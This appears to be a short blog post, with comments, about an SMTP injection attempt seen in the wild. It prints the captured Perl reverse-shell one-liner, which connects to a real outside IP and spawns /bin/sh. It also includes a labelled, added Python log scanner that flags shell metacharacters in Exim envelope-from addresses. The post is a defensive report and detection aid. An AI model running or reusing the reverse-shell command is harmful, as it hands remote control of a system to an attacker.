SMTP: envelope-from address tries to execute perl
earlier today, found this:
(and someone else, too.)
of course, no one wants to execute the downloaded file a.pl:
perl -e ‘use Socket;$i=“178.218.211.118”;$p=9000;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};’
not sure which MTA is vulnerable, yet.
…in the meantime i found RedTeam Pentesting GmbH has a detailed advisory on the problem: Exim with Dovecot: Typical Misconfiguration Leads to Remote Command Execution - here
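a quick way to check your own logs for this kind of sender, as an added example that is not part of the original post or the advisory: it assumes Exim main-log arrival lines (`<=` followed by the envelope-from), the function name is hypothetical, and the sample log lines are constructed.

```python
import re

# Exim main-log arrival line: "<date> <time> <msg-id> <= <envelope-from> H=... [ip] ..."
ARRIVAL = re.compile(r" <= (\S+)")
HOST_IP = re.compile(r"\[([0-9A-Fa-f.:]+)\]")

# Characters a shell interprets. Several of them are legal in an e-mail
# local part, so a hit means "look at this line", not "confirmed attack".
SHELL_META = set("`$;|&<>(){}\\'\"")


def suspicious_senders(log_lines):
    """Return (sender, remote_ip, metacharacters) for each flagged arrival line."""
    hits = []
    for line in log_lines:
        m = ARRIVAL.search(line)
        if not m:
            continue  # not an arrival line
        sender = m.group(1)
        if sender == "<>":
            continue  # null sender of a bounce, not an injection attempt
        found = sorted(set(sender) & SHELL_META)
        if found:
            ip = HOST_IP.search(line[m.end():])
            hits.append((sender, ip.group(1) if ip else None, "".join(found)))
    return hits


# Constructed sample lines (documentation addresses, placeholder command text).
SAMPLE_LOG = [
    "2013-05-06 10:00:01 1UZaaa-0001Xy-2B <= alice@example.org "
    "H=mail.example.org [192.0.2.10] P=esmtp S=2048",
    "2013-05-06 10:00:02 1UZaab-0001Xz-3C <= <> R=1UZaaa-0001Xy-2B "
    "U=Debian-exim P=local S=1024",
    "2013-05-06 10:00:03 1UZaac-0001Y0-4D <= x`placeholder${IFS}cmd`@example.invalid "
    "H=(localhost) [198.51.100.7] P=smtp S=300",
]

if __name__ == "__main__":
    for sender, ip, chars in suspicious_senders(SAMPLE_LOG):
        print(f"suspicious envelope-from {sender!r} from {ip} (chars: {chars})")
```
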
Comments:
Any news on this? I received three of these yesterday on my LAMP webserver, this is the first attempt detected.
I searched on Google but I only found this blog entry.
iiegn -
RedTeam Pentesting GmbH has a detailed evaluation of the problem: Exim with Dovecot: Typical Misconfiguration Leads to Remote Command Execution - here